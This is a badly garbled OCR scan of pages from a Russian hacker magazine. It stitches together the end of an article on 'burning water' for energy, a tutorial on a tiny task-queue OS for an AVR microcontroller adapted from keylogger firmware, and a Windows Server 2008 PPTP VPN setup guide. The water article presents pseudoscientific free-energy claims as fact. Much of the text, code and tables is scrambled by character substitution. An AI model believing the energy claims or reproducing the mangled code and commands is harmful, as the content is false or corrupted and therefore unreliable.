дцргтваі 

• Дешевизна процесса. 

• Доступность топлив а для установки. 

Различные габариты (от размеров стиральной 

машинки до любых необходимых, — зависит от требу- 
емой мощности) . 

Безопасность. При непредвиденных ситуациях про- 
цесс расщепления воды можно мгновенно остановить. 

Экологичность. Установка не вьщеляет углекислого 
газа и озонирует воздух. 

• Сравнительно небольшой вес установки. 

• Конечная себестоимость реактора, по приблизи- 
тельным оценкам, составит 150- 200 тыс. рублей. 




► 114 



ХАКЕР 03 /123/ 09 



рЬгеакіпд 








Схематичное описание работы установки 

(цифрами обозначен порядокиспользования элементов) 



г ПОДЫТОЖИМ ИМЕЮЩЕЕСЯ 

Ну вот, мы стобой поставили целую уйму опытов по сжиганию воды, 
но все равно — сколько ни углубляйся в этутему, я вижу больше белых 
пятен, нежели ответов. Постоянно можно находить что-то настолько 
новое и малоизученное, что руки так и тянутся что-нибудь построить! 
Например, на базе наших исследований вполне можно создать нетолько 
высокоэкономичные системы отопления, но и полностью автономную 
«водоплазменную» электростанцию, способную вырабатывать энергию 
не только на поддержание резонатора, но и для потребителя. Постро- 
ив та кую установку, реально получать электроэнергию и\или тепло. 
Запускаться она будет от стартового аккумулятора. Аккумулятор может 
быть подзаряжен отсамого реактора после его прогрева. Отмечу крайне 
малый расход сжигаемой воды. Аза счетее возвращения в камеру сго- 
рания мы получаем цифры порядка 1 литра на 200 киловаттэнергии (по 
приблизительным подсчетам). 

Н КЧЕРТУОТОПИТЕЛЬНЫЕСИСТЕМЫ! 

Представим диалоге инвестором. Допустим, он скажет — «Меня не 
интересует отопление, что вы можете предложить еще?». 

На основе данной технологии можно ввести следующие инновации: 




Высоковольтный подогреватель 



• Авиационные и космические реакторы; 

• Новые виды бурильныхустановок; 

• Промышленные и портативные очистители, опреснители и дезинфе- 
Каторы ВОДЫ; 

• Энергощиты, снижающие кинетический урон технике; 

• Портативные устройства для резки тугоплавких материалов; 

• Легкий реактивный двигатель; 

• Оружие; 

• Химическая промышленность по пиролизу новых веществ. 

Словом, ятебе немного приоткрыл путь для исследований, показал кое- 
что готовое и дал представление об одной из тысяч наиинтереснейших 
технологий, которые доступны человечеству. Вода до сих пор плохо изучена, 
несмотря на ее кажущуюся доступность. Только одномутебе известно, чего 
ты сможешь добиться, занимаясь этой тематикой. Удачи. ^ 
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ОСЕВЫЕ 

ТЕХНОЛОГИИ 



I 



ПИШЕМ СВОЮ МИКРООПЕРАЦИОННУЮ СИСТЕМУ 



Если всерьез занялся конструированием железа на микроконтроллерах, — не- 
избежно придется писать разного рода прошивки. Ведь контроллер это, прежде 
всего, заложенная в нем управляющая программа. Пришло время уделить вни- 
мание софтверной части современной электроники. Возьмем и напишем, ни 
много, ни мало, собственную операционную систему. 



в ос это НЕ только ЖИРНЫЙ злой МУХ 

При словах«операционная система» воображениетутже рисуетчто-то 
монстровидное, вроде ѴѴіпсІоѵѵз — занимающее сотни мегабайт, требу- 
ющее кучи оперативки лишь для того, чтобы запуститься. Кто более про- 
двинут, вспомнит*піх-семейство, всякиеОМХи исЫпих. Но и это жирная 
вещь, которой нужно не меньше мегабайта памяти и, какминимум, 32-раз- 
рядный процессор. Ачтоу нас?У насхардкор! Для пущейжести возьмем 
не какую-нибудь АТМедаІ 28, ноАТТіпу2313с2 Кб памяти. Если учесть, что 
надо выделить место под прикладную часть, — тратить на операционную 



систему более 700 байтмне, честно говоря, совершеннозападло. Слабо 
накатать операционку на 600 байт? Сейчас посмотрим. 

В АЗАЧЕМ? 

Прежде чем кидаться на штурм АѴП Сіибіо, надо все же подумать, а зачем 
нам операционная система? Какиезадачи мы хотим на нее повесить? 
Первое, что требуется отоперационной системы, это облегчить труд про- 
граммиста. Сделать так, чтобы можно было создать единую шаблонную 
прошивку, в которую без проблем дописывается что угодно. То есть, опе- 
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Структура нашей ОС 



рационная система должна выполнять задачи. Подзадачами я понимаю 
какие-либо действия с контроллером и периферией. Например, мигнуть 
светодиодом, считать байтиз внешней памяти, обновить изображение 
на экране, послать байт в последовательный порт. Да практически 
любое действие, выполняемое микроконтроллером. 

Задачи должны подключаться легко и непринужденно, чтобы нам не прихо- 
дилось думать как бы одновременно и дисплей обновить, и диодом мигать, и 
принимать данные по порту, незабывая слатьдиагностические сообщения. 
Также операционная система должна брать на себя некоторые сервисные 
функции, скажем, организовать службу таймеров, чтобы прикладные задачи 
не парилисьпо поводу разделения временныхинтервалов. 

Н РЕАЛИЗАЦИЯ 

Классическая операционная система реального времени работает 
примерно следующим образом. На каждую задачу отводится свой 
кусочекоперативной памяти, свой стек, свое адресное пространство. А 
диспетчер задач ОС постоянно тасует их между собой, по очереди запус- 
кая на некоторое время то одну, то другую задачу. Период работы задачи 
называется квантом времени. Такое можно реализовать на АѴП, но на 
это уйдеточень много оперативки, которой и так кот наплакал. Да и, в 
отличие от х86-архитектуры, тут нет никаких аппаратных средств, вроде 
защищенного режима. Поэтому мы пойдем другим путем. 

В В ОЧЕРЕДЬр СУКИНЫ ДЕТИ, В ОЧЕРЕДЬ! (С) ШАРИКОВ 

Собственно, полноценная ось реального времени нам особо не нужна. 
Достаточно, чтобы события выполнялись в срок. Поэтому мы организуем 
диспетчер и очередь событий. Каждое задание будет выполняться по 
этому списку, ставя туда либо вновь себя, либо уже другую задачу. 

Все внешниезапросы, требующие незамедлительной реакции, напри- 
мер, прием байтов по САВТ или какой-нибудь ІМТО, будут по-прежнему 
осуществляться прерываниями. Стой разницей, что теперь обработчик 
может или сам выполнить задачу, если это оченьсрочно, или добавить ее 
в очередь, и она будет исполнена, когда до нее дойдет время. 

Н ВРЕМЯ Ч 

Сдной очереди мало. Надо бы еще службу таймеров добавить. Тай- 
мер — это же чертовски ценный ресурс! Стмерять время нужно пос- 
тоянно и под разные задачи. Таймеров в контроллере мало, обычно 




всего три, поэтому надо придумать средство, чтобы один таймер мог 
отмерять множество разных интервалов. Сделать это проще всего 
той же очередью. Хотим мы, чтобы через секунду случилось событие 
какое-нибудь — например, зажегся светодиод. Не вопрос — кидаем 
в тай мерную очередь идентификатор события, время которого нам 
надо отсчитать, и вперед! Таймер будет выбрасывать на, скажем, 
каждый десятитысячный импульс тактового генератора свое преры- 
вание. В нем мы, по-быстрому, инкрементируем счетчик конкретного 
задания, а если он стал равен нулю, то это задание мы отправляем в 
очередь на исполнение. Потом переходим ко второй записи в цепоч- 
ке таймеров и проверяем ее. И так — до тех пор, пока не обслужим 
все временные интервалы. Просто и эффективно! 

Н КОНТРОЛЛЕР ПРЕРЫВАНИЙ 

Каждое аппаратное действие обычно сопровождается генерацией 
прерываний. Пришел байт в порт — прерывание. АЦП обработал 
аналоговый сигнал — прерывание. Ушел байт — прерывание. 
Буквально на каждый чих. Оченьудобно! Можно всю программу 
развесить на обработчики, оставив в главном цикле пустой код. Но 
есть одна проблема — приоритеты прерываний. На АѴН нетаппарат- 
ного контроллера, так что когда приходит прерывание, то аппа- 
ратно запрещаются другие. И правильно, иначе может произойти 
срыв стека. Однако, запретив вообще все, мы рискуем проморгать 
важное событие. Приведу пример. Есть у нас АЦП и еще мы ждем 
байты по ОАНТ. Запустили обработку АЦП, сигнал оцифровался, и 
преобразователь сгенерировал прерывание: мол, готово, забирай. 
Обработчик АЦП кинулся пережевывать данные, да вот засада — в 
этот момент пришла посылка в ОАНТ, а прерывания-то запрещены. В 
итоге, посылку из О АНТ мы прозеваем и вовремя не успеем среаги- 
ровать. Как быть? Выход один — делать обработку прерываний как 
можно короче. В идеале: две-три команды. Тогда проблема решается 
следующим образом. АЦП сработал и дал приказ закинуть в очередь 
на исполнение задачу по обработке байта. ІІАВТ принял байт и сразу 
закинул в очередь свое задание на исполнение. 

Так и другие прерывания: не делают ничего сами, а пихают все в 
копилку. А вот главный цикл программы, который крутится постоянно 
и имеет низший приоритет, спокойно и методично разберет эту оче- 
редь и выполнит все не в порядке поступления, а в порядке важнос- 
ти. То есть, БАЕТ — немедленно, а АЦП может и подождать. 

Н ПРИСТУПИМ 

Изобретать велосипед мы не будем, благо, все изобретено до нас. 
Осталось идею подсмотреть и воплотить. Лучший способ научиться 
программировать — взять дебаггер и посмотреть, как это делают 



ХАКЕР 03 / 123 / 09 



► 117 




рЬгеакіпд 





Возврат к месту лрерыеанхя 

Работа главного цикла 



Диспетчер задач 



другие. Так и тут. Идея микро ОС была нагло слизана с реализации 
прошивок в сотовых телефонах Моіогоіа, и вначале камрад 5егд2х2 
портировал ее на микроконтроллер архитектуры 051 , а потом и на 
АѴР перетащили. 0 этой о пе рацион кой ты уже мог сталкиваться, 
если пробовал собирать логгер клавы по рецепту бИпу] (сделано на 
такой же оси, благодаря чему удалось все запихать в крошечный 
АТТІпу2313). 

Я взял тотже самый проект, очистил его от прикладной шелухи... и сей- 
час подробно распишутебе анатомию работы ядра 00. 

Во главу угла тут ставится манипуляция программным счетчиком на 
базе таблицы переходов. Счетчик есть абсолютно в любом процессо- 
ре. Программа находится в памяти, и каждая ассемблерная инструк- 
ция расположена по какому-либо адресу. Значение программного 
счетчика (РС) указывает на адрес, куда на следующем такте перейдет 
процессор. Есть команды вроде РЗМР или ВРхх, которые закиды- 
вают в РС адрес перехода. Так осуществляется ветвление. Наши 
подпрограммы-задачи представляют собой просто участки кода. Нам 
нужно лишь передать на них управление. Сделать это проще всего 
с помощью таблицы переходов. Где-нибудь в памяти мы создаем 
массив, в котором у нас хранятся адреса задач, по порядку. Каждой 
подпрограмме присваивается номер в та блице. И теперь, зная номер 
нужной задачи, очень легко вычислить адрес перехода. Делается 
это обычным смещением от начала таблицы. Так как длина адреса 
всегда равна двум байтам, то достаточно просто умножить номер на 
два и прибавить к начально му адресу. 

Для формирования этой таблицы мы в файле беІсопзГіпс создаем таб- 
лицу имен. Она нужна только для нашего удобства, чтобы оперировать 
именами, а не цифрами. Выглядит она так: 



.едиЕѴ_Ісі1е = О ; Простой — ШР 

. ери ЕѴ_КЬ(іВаЦаКесеіѵесі = 1 ; 

.ери ЕѴ_ип1оскКеуз = 2 

.ери ЕѴ_ВізрІКедеп = 3 

. ери ЕѴ_Зеп(ТРаскеЦ = 4 

.ери ЕѴ_Тітеоик1 = 5 

.ери ЕѴ_Тітеоик2 = б 

.ери ЕѴ_ТітеоиЦЗ = 7 

. ери ЕѴ_Зііоѵ^ = 8 

.ери ЕѴ_ТхСотр1еке = 9 



Регенерация дисплея 



Тезк (Регенерация дисплея) 
Тезк (Моргание светодиодом) 



Названия совершенно произвольные и взяты из программы кей- 
логгера, как есть. Ты можешь назвать их как тебе угодно, главное. 



сам не забудь, где что. Тут мы задаем всего лишь имена вызываемых 
функций и номер, на который эта функция будет откликаться. 

Азатем в файле с основной программой ЕоддегАиіпуЗЗІЗ.азт, в самом 
низу, в памяти программ, создадим таблицу переходов. Выглядеть она 
будет та К: 

ЕѵепСзРгосз : 



. (і\л? ІсІІе ; 


[00] 


ЕѴ_Ісі1е 


.(і\л? Ргос_КЬ(іВакаКесеіѵе(і ; 


[01] 


ЕѴ_КЬсіВак аКес е і ѵесі 


. (і\л? ІсІІе ; 


[02] 


ЕѴ_Вп1оскКеуз 


.СІѴ7 ІсІІе 


[03] 


ЕѴ_ВізрІКедеп ; в зави- 


симости от типа дисплея 
.СІѴ7 ІсІІе 


[04] 


ЕѴ_ЗепсіРаскек 


. сі\л[ РгодТезкІ ; 


[05] 


ЕѴ_Тезк Візрі 


. сі\л[ РгодТезк2 ; 


[Об] 


ЕѴ_Тезк ЕЕВ 


. сі\л[ РгодТезкЗ ; 


[07] 


ЕѴ_Тезк ВАКТ 


.сі\л[ Ргос_3]тоілКесеіѵесіВака 


; [08] ЕѴ_3]тоѵ\[ 



Метка ЕѵепіРгосз — это начало таблицы, и от нее будет вестись весь 
отсчет. А вот в секциях бѵѵуже расположены реальные метки на 
процедуры и функции. Если мы вызываем функцию с номером 00 ака 
ЕѴ_ІсІ[е, то по таблице переходим на реальную функцию ІсІІе, которую 
ты можешь найти в файле ЕоддегАиіпу231 3.азпп. Вызов функции [03] 
ЕѴ_ВІ5р[Ведеп тоже ведет на Іске, но это моя прихоть. Дело в том, 
что когда я очищал программу от прикладной части, то безжалостно 
выкинул все, что касается индикатора. Азначитифайлысописани- 
ем функций дисплея, в том числе, с процедурой регенерации. Вот и 
пришлось ее заглушить на ІсІІе. 

Остальные метки, такие как Ргос_5бо\л/ВесеіѵесЮа1;а или РгодТезіЗ, 
присутствуют в тексте программы. Чуть вышетаблицы переходов. Я, 
правда, ихтоже подчистил, выкинув всютребуху и оставив только вызов. 
Получился воттакой скелет: 

Ргос_КЬ(іВакаКесеіѵесі : 

ШР 

ШР 

ШР 

Кек 

По поводу выкинутого — не переживай, я положу на дискеще и ориги- 
нальную программу, со всем содержимым, чтобы ты мог посмотреть всю 
систему на реальном примере. 

Создали мы таблицу, теперь надо создать очередь. Для этого в ОЗУ зада- 
ем ряд меток. Описываются они в сІеІсопзЕіпс, в самом низу: 
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Перешли из диспетчера очереди. На очереди задача 1 



Числа взяты от балды 
в реала могут быть 
какими угодно 
Да и не надо тебе 
их знать - оставь... 
черновую работу 
компилятору 



ЗадачаО: 0014^ гсаІІ ІвбСЖ ; Типа код, от балды 

0015 1(юК19 2 ЭТО индексный регистр 

0016 по)а Через него идут все обращения 

0017 ГВІ \ к памяти. Также он может адресовать 

... индексный переход. 

Задачаі: 0614^ гсаІІ Івсібя ; Типа код, от балды 
0615 іпдЯІб 



0616 
0617 
ь. 0618 



пор 

геі 



0РА4 

0РА5 

ЕѵелІРгос*: ОРАб^ 
0РА7 
0РА8 
0РА9 
ОРАА 



Адреса задачи в таблице 
Вычисление смещения в таблице 

Смещение в словам 



0x00:0x14 



0x06:0x14 







/^ЗадачаО 0РА6 Н) 0РА6*2^ 

Н Задачаі ОРАб @ 0РА6‘2® 
М3адача2 0РА6 «2 0РА6*2«4 
яЗадачаЗ 0РА6 О 0РА6*24б 
и Задача4 0РА6 М 0РА6*2^8 



Тшрзі 



Уиж)і№на2 

АФ2) 




таблицы вбаёгах 

2=0РА6‘2 



і* Ттр 3 адрес ячейки 
в ячейке адрес перехода 



Загрузитъ из таблицы 
адрес перехода 



2=0В14 



Переход ПО адресу В 2 



Адреса в памяти программ нумеруются в словах, по 2 байта 



Весь гемор с умножениямии из>за 
того, что память кода адресуется 
словами, а процессорное ядро 
опрерирует байтами вот и приходится 
переводить смещение из слов в байты. 
Только тогда можно загрузить из памяти 
в индексный регистр адрес перехода 



Вычисление адреса 



. еди ЕѵепСзСиеиеЗіге = 11 

; Размер очереди событий 
. еди ЕѵепбзСиеие = $А0 

; АО — АА (11 ЬуРез) — Адрес очереди событий 

ЕѵепІзОиеиеЗіге — нужен, чтобы знать, сколько всего значений у нас 
может быть в очереди. Максимум — 1 1 , но можно сделать сколько угодно, 
лишь бы оперативки хватило. 

ЕѵепІзОиеие — это непосредственно адрес в ОЗУ контроллера. Не забы- 
вай, что ОЗУ и память программ — это две разные памяти. И величина 
ОЗУ всего несколько сотен байт, большая очередь может и не влезть. 
Адрес выбирается произвольно, но надо помнить, что в верхних адресах 
располагается стек и он возрастает вниз. Если утебя стек наедет на оче- 
редь, то случится переполнение стека и программа пойдет выполнять 
уже не то, что ты запланировал, а то, что туда закинуло стеком — воттебе 
и атака на переполнение буфера в чистом виде. 

Для постановки задачи в очередь есть функция ЗепбЕѵепІ:, располо- 
женная в файле кегпеі.іпс. Достаточно записать в регистр Ттрі номер 
задачи и вызвать эту функцию, каконатутже встанет в список последней 
по счету. Воттак: 

Ібі Ттрі, ЕѴ_ВізрІЕедеп 
гсаІІ ЗепбЕѵепР 

Главный цикл содержитв себе лишь процедуру обслуживания очере- 
ди задач и время простоя, тот самый ібіе и сброс защитного таймера 
ѵѵаІсЬбод. 

МаіпЕоор : 

Ѵ7бг ; сброс ѵ\?абс1ібод 
гсаІІ РгосеззТазкСиеие 
гсаІІ Ібіе ; Простой Ядра 

гзтр МаіпЕоор 

Ібіе : 

пор 

геб 

Процедура РгосеззТазкОиеие из кегпеі.іпс проверяет наличие в 



очереди какого-либо зада- 
ния (номер задачи, отличный 
от ОхЕЕ) и, если находит, то 
осуществляет туда переход. При 
этом удаляется номер из списка, 
и вся цепочка сдвигается на 
один шаг вперед. 

В СЛУЖБА ТАЙМЕРОВ 

Поговорим о важнейшей части 
нашей микрооси. Она заведует 
всем, что работает в фоновом 
режиме. Висит все на аппарат- 
номтаймереТІ на прерывании 
по совпадению (том самом, 
который используется для 
создания ШИМ). Сделано это, 
чтобы каждый раз не задавать 
предварительное значение 
счетчика. Кактолько состояние 
счетного регистра достигнет 
порога,— унас свершится тай- 
мерный тик и процессор кинется 
проверять, что там с нашей оче- 
редью задержек. Находится по 
метке: ОиЮотрІ АІпЕ которую ты 
увидишь почти в самом начале файла ЕоддегАМіпуЗЗІ З.азпп. Здесь 
я приводить все не буду, так как журнал нерезиновый.ав исходнике 
комментариев будет предостаточно. Опишу лишь алгоритм. 

При входе в обработчик загружается адрес начала очереди таймеров. 
Затем берется первый байт и проверяется, не равен ли он ОхЕЕ — это 
значит, что данный таймер выключен. Если равен, то прибавляем к 
начальному адресу очереди числотри, чтобы выбрать следующий 
таймер и также его проверить. Если же таймер содержит какое-то 
значение (номер процедуры), значит, он активен и надо уменьшить на 
единицу число, которое стоит в следующих двух байтах. Результат про- 
веряется на ноль. И если там образовался ноль (то есть, время вышло), 
то число из первого байта та ймерной записи отправляется прямиком 
в очередь событий, а мы переходим кследующемутаймеру. Если ноль 
не получился, —то просто переходим кследующемутаймеру. Такдо 
тех пор, пока не проверим каждую запись в очереди! Сама очередь 
находится в ОЗУ и описывается втом же беІсопзЕіпс. 

. еди ТітегзРооІЗіге = 5 ; Количество таймеров 

. еди ТітегзРооІ = $В0 

; ВО-ВЕ — Адреса информации о таймерах 

ТітегзРооІЗіге — это очередьтаймеров. Точнее, даже не очередь, а 
просто количество софтверныхтаймеров, которые мы можем организо- 
вать. Тут их сделано пять штук. На каждый таймер отводится по 3 байта 
— вначале идет номер процедуры, которую должен вызвать таймер, а 
потом два байта на временной интервал. Например, тебе надо вызвать 
РгодТезІ:! через 0x6543 тиков. Тогда ты помещаешь в таймеры такую 
запись — 05:65:43. Байт номера и два байта времени. Длительность 
одного тика настраивается отдельно и зависит от частоты процессора и 
коэффициента деления таймер-счетчика. Об этом я уже писал в прошлых 
статьях про архитектуру АѴН. 

ТітегзРооІ — непосредственное размещение этих переменных в памя- 
ти. Нужно выставить та к, чтобы не перекрывалось с очередью задач и не 
залезло на стек. 

Н КЕТІ 

Как видишь, создать операционную систему не та к уж и сложно. 
Главное, четко представлять, что мы хотим получить. А дальше — уже 
наворачивать по вкусу, добавлять фишки и удобства. Удачи! ^ 
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Это надежное и безопасное средство, предн аз наченное для о^анизации 
І межсайтовой сетевой инфраструктуры и подключений удаленного досту- 
а. В последние годы среди существующих ѴРМ-протоколов особое место I 



|и обеспечивают уровень защиты, достаточный для большинства компаний. 



ПОЧЕМУ ИМЕННО РРТР? 

Туннельный протокол РРТРпозволяетза шифровать мульти протокольный 
трафик, а затем инкапсулировать (упаковать) его в ІР-заголовок, который 
будет отправлен по локальной или глобальной сети. РРТР использует: 

• ТСР-подключение для управления туннелем; 

• модифицированную версию ЭРЕ (общая инкапсуляция маршрутов) для 
инкапсулирования РРР-фреймов тун нелированных данных. 

Полезная нагрузка передаваемых пакетов можетбытьзашифрована (с по- 
мощью протокола шифрования данных МРРЕ), сжата (используя алгоритм 
МРРС) или зашифрована и сжата. РРТРлегокв развертывании, натребует 
инфраструктуры сертификатов и совместим с подавляющим большинс- 
твом МАТ-устройств. Все версии М іеговой ѴѴіпбоѵѵз, начиная с ѴѴіпбоѵѵв 95 
05Р2, включают в свой состав РРТР-клиент. Также клиенты для подклю- 
чения по РРТР есть в Еіпих, хВ50 и Мае 05 X. Провайдеры знают об этих 
преимуществах, и именно поэтомудля организации подключения кинтер- 



нету часто используют РРТР, даже несмотря на то, что изначально у него 
защищенность ниже, чем у Е2ТР, 1Р5ес и 55ТР (РРТР чувствителен к сло- 
варным атакам, кроме того, ѴРМ-подключение, основанное на протоколе 
РРТР, обеспечивает конфиденциальность, но не целостность передавае- 
мых данных, так как отсутствуют проверки, что данные не были изменены 
при пересылке). Стоит отметить: в больших сетях РРТР предпочтительнее 
РРРоЕ. Ведьпри использовании последнего поисксервера производится 
путем рассылки широковещательных пакетов, которые могут потеряться 
на свичах, да и сетьтакие пакеты «наводняют» весьма прилично. 

АУТЕНТИФИКАЦИЯ И ШИФРОВАНИЕ 

В Ѵізіа и ѴѴіп2к8 список опознавательных протоколов РРР заметно сокра- 
щен. Исключены 5РАР, ЕАР-МВ5-СНАР и М5-СНАР, которые давно при- 
знаны небезопасными (в них используются алгоритмы хеширования МВ4 
и шифрования ВЕ5). Список доступных протоколов теперь выглядит так: 
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Выбор служб ролей 




» ЗУН/АСК 






Выберите службы ролей дли установки дга Службы политики сети и доступе: 



Службы роді: 



Службы маршрутиЗАвіи и удалеммото доступа 



С Сервер политики сети 

вт_ "■ 

Служба уделенного доо^упв 
Маршрутишвя 

□ Центр репістрещіи работоспособности! 

□ Протокол евторизешіі^ учет«и данныя узла 



Отисание: 

Спуж^ мэрш р ущаіеіи і* 
уделенного доступе лредоставляют 
удалеыіым пользователя н доступ к 
ресурсен в честной сети через 
йіфтуалыі^ю частную сетъ Сѵ^РМ) 
или подключения удаленного 
доступа. Серверы с насгроетой 
сгуъ^й нэршрутиззідѵ и 
удаленного доступа предосга&пяют 
сгул^ иаршруткзаиии локальных 
ы глобальных сетей д ля соединения 
сегкентов сети внутри небольшой 
организации или для соевинетшя 
двух честных сетей через Интернет, 



Доподмтешлы^ сведемся о службам ролей 



Далев > 



Отненаі 



— шіловые иѵяібы ^'^іпсс'Д'Б ьѵѵеі міі не устаяввл&ив 
Служба реппикаиии файлов не усгановлеио 

О при испо№зованіиі настерв обновлегите оп'ключепа 



іужбы 



службы 



Т 



И 1 1 Днспетчео сеовеоа 

Установка КРА5 сервера для работы РРТР 




РАР, СНАР, М5СНАР-ѵ2 и ЕАР-Т15 (требует наличия пользовательских 
сертификатов или смарт-карт). Настоятельно рекомендуется использо- 
вать М5СНАР-ѵ2, поскольку он надежнее и обеспечивает взаимную ау- 
тентификацию клиента и сервера. Также посредством групповой полити- 
ки предпиши обязательное применение сильных паролей. 

Для шифрования ѴРМ-соединения при помощи МРРЕ используются 40, 
56 и 128-битные Р5А РС4 ключи. В первых версиях ѴѴіпбоѵѵз из-за огра- 
ничений на экспорт военныхтехнологий был доступен только 40-битный 
ключ и с некоторыми оговорками — 56-битный. Они уже давно призна- 
ны недостаточными, и, начиная с Ѵізіа, поддерживается исключительно 
128-битная длина ключа. Может возникнуть ситуация, чтоу клиента под- 
держки такой возможности нет, поэтомудля старых версий ѴѴіпбоѵѵз надо 
накатить все сервис-паки или обновления безопасности. Например, 
ѴѴіпХР 5Р2 без проблем подключится ксерверу ѴѴіп2к8. 

Чтобы самостоятельно просмотретьсписокподдерживаемыхсистемой ал- 
горитмов и длин ключей, обратиськветке реестра НКЕУ_Е0САЕ_МАСН1МЕ\ 
5У5ТЕМ\Сиггеп1:Соп1:го[5е1:\Соп1:го[\5есигі1:уРгоѵібег5\5СНАММЕЕ. В част- 
ности, настройки алгоритмов шифрования находятся в ветке СірЬег5\РС4. 
Принудительно активировать нужную опцию можно, создав параметр 
бѵѵогб «ЕпаЫеб» и установив его значение в Есть и другой способ, 

который Місгозоі'І: не рекомендует, — активировать поддержку 40/56-бит- 
ных РС4 ключей на сервере ѴѴіп2к8. Для этого необходимо установить в 
«1 » параметр реестра НКЕМѴЗузІеппѴСиггепЮопІгоІЗеДЗегѵісезѴРазппапѴ 
РагаппеІегзѴАиоѵѵРРТРѴѴеакСгурЬ и перезапустить систему. 

НАСТРОЙКА СЕРВЕРА РРТР В ѴѴІМ2К8 

Типичная конфигурация для работы ѴРМ состоит из контроллера доме- 
на, серверов ВВА5 (Роибпд апб Веппоіе Ассезз) и МР5 (Меіѵѵогк Роксу 



КП 11^ 



Вегѵег). В процессе настройки этих ролей дополнительно будут активиро- 
ваны сервисы ВНСР и ВМ5. Сервер, которому предстоит выполнять роль 
ѴРМ, перед установкой роли Р РАЗ должен быть присоединен к домену. В 
отличие от Е2ТР и 55ТР, сертификаты при работе РРТР не нужны, поэтому 
сервер сертификатов (Сегббсаіе Зегѵісез) не потребуется. Сетевые уст- 
ройства, которые будут участвовать в построении ѴРМ (в том числе, АВ5Е 
и подобные модемы), должны быть подсоединены и настроены соответс- 
твующим образом (Пуск -> Панель управления -> Диспетчер устройств). 

Сначала настроим РРА5 при помощи мастёріі 
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>> 5ѴМ/АСК 




> ІП^О 

• РРТР был разрабо- 
тан еще до создания 
стандартов ІРзес 

и РКІ и в настоящее 
время является 
самым популярным 
ѴРМ-протоколом. 

• Читай о 55ТР в ста- 
тье «Слоеный ѴРМ» 
(августовский номер 
^-^за 2008 год). 

• Про настройку 
РоРТоР/МРО читай 
в статье «Виртуаль- 
ная сеть для ѴѴіпсІоѵѵз 
клиента» в июльском 
номере^-^за 2007 
год. 




[Выбор пункта «Особая конфипрация» в мастере настройки сервера РРА5 позволяет создать любую конфипдіацию ѴРМ| 



Для некоторых схем ѴРМ (с использованием МАТ и при со- 
единении двух сетей) потребуется, как минимум, два сетевых 
устройства. 

Используя мастер установки ролей (Диспетчер сервера 
Роли Установить роль), устанавливаем роль «Службы 
политики сети и доступа» (Меіѵѵогк Ассезз Сегѵісез) и пере- 



ходим к выбору служб ролей, где отмечаем все компоненты 
«Службы маршрутизации иудаленногодоступа»(Роибпд апб 
Реппоіе АссеззСегѵісез). Нажимаем «Далее» и в следующем 
окне подтверждаем настройки щелчком по «Установить». 
Служба удаленного доступа и маршрутизации установлена, 
но еще не настроена и не запущена. Для настройки пара- 



Управление ККА5 при помощи Кеіі8П 



Некоторыми настройками ККА5-сервера можно управлять при 
помощи утилиты Ыегзіі (пегѵѵогк зЬеІІ) . Добавить тип проверки под- 
линности учетной записи можно при помощи команды: 

> ЫеСзЬ газ айй аиСІЩуре РАР | М05СНАР | МЗСНАРѵ2 | ЕАР 

Для ранних версий ѴѴіпсІоѵѵз еще и М5СНАР 1 5РАР. Режим проверки: 

> ЫеСзЬ газ зеС аиСЬтосіе ЗТАЫВАКВ | ЫООСС I ВУРАЗЗ 

Зарегистрировать компьютер как ККАЗ-сервер в АН: 

> ЫеСзЬ газ асісі гедізСегесізегѵег 
Добавить расширение РРР: 

> ЫеСзІт газ асісі Ііпк ЗѴ^С I ВСР 

Расширение 5ѴѴС обеспечивает программное сжатие, а ЬСР активи- 
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рует одноименное расширение протокола РРР. Типы многоканаль- 
ной связи поддерживаемых РРР: 

> ШеДзІ! газ асісі шиісіііпк мивті | ВАСР 

Свойства учетной записи задаются следующим образом: 

> ЫеСзк газ зеС изег 

При помощи «Беи сИепи» можно просмотреть статистику или отклю- 
чить клиента. Сохранить и восстановить конфигурацию ККА5 при 
помощи ЫеГзЬ также просто: 

> МеСзЬ. газ йитр > «бііепате» 

> ЫеСзЬ. ехес «бііепате» 

Кроме этого, очень много настроек содержит контекст «газ аааа». 
Подробно о Ыегзіі смотри в статье «Командный забег в лагерь Лонг- 
хорна» в февральском номере журнала за 2009 год. 
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Мастер настройки пакета СМАЩ 



[Настройка портов в консолй^ 



метров работы переходим в «Диспетчере сервера» во вкладку «Роли^ 
Службы политики сети и доступа Службы маршрутизации и удаленного 
доступа»: как вариант, можно использовать консоль «Маршрутизация 
и удаленный доступ», вызываемую из вкладки «Администрирование» 
меню «Пуск». 

Отмечаем наш сервер в списке (консоль может быть подключена к не- 
скольким системам) и в контекстном меню щелкаем «Настроить и вклю- 
чить маршрутизацию и удаленный доступ» (Сопбдиге апб ЕпаЫе Роибпд 
апб Ретоіе Ассевз). Если до этого предпринимались попытки настроить 
службу, то для повторной установки некоторых параметров придется ее 
остановить, выбрав пункт «Отключить маршрутизацию и удаленный до- 
ступ». При этом все настройки будут сброшены. Появившийся мастер 
установки предложит выбрать типичную конфигурацию сервера, которая 
наиболее точно соответствует предполагаемым задачам. В меню выбора 
— пять пунктов, четыре из них предоставляют готовыеустановки: 

• Удаленный доступ (ѴРМ или модем) — позволяет пользователям под- 
ключаться через удаленное (коммутируемое) или безопасное (ѴРМ) под- 
ключение; 

• Преобразованиесетевыхадресов (МАТ) — предназначено для подклю- 
чения к интернету нескольких клиентов через один ІР-адрес; 

• Доступ к удаленной сети (ѴРМ) и МАТ — является миксом предыдущих 
пунктов, предоставляетвозможность выхода в интернетсодного ІР-адре- 
са и удаленного подключения; 

• Безопасное соединение между двумя сетями — подключение одной 
сети к другой, удаленной. 

Следующий шаг для каждого из этих пунктов будет индивидуальным. На- 
пример, при настройке 55ТР (см. статью «Слоеный ѴРМ» в ^-^_08_2008) мы 
выбирали третий сценарий. Для РРТР подойдетлюбой из предложенных 
вариантов, хотя рекомендуемым считается пункт «Удаленный доступ», 
установленный поумолчанию. Если есть затруднения при выборе схемы, 
выбери пятый пункт «Особая конфигурация», либо по окончании работы 
мастера продолжи настройку в ручном режиме. Кроме того, можно обра- 
титься кдокументации, нажав ссылку «Подробнее», расположенную вни- 
зу окна. 

На следующем шаге отмечаем список служб, которые следует включить на 
сервере. Таких пунктов пять, их названия говорят сами за себя: 

• Доступ к виртуальной частной сети (ѴРМ); 

• Удаленный доступ (через телефонную сеть); 

• Подключение по требованию (для маршрутизации отделений органи- 
зации); 

• Преобразование сетевых адресов (МАТ); 

• Маршрутизация локальной сети. 

Собственно, все предустановки, о которых говорилось выше, сводятся к 
активации этихслужб в разной комбинации. В большинстве случаев сле- 
дует выбрать «Удаленный доступ (ѴРМ или модем)», а затем — «Доступ к 



виртуальной частной сети (ѴРМ)». Далее просто нужно указать на сете- 
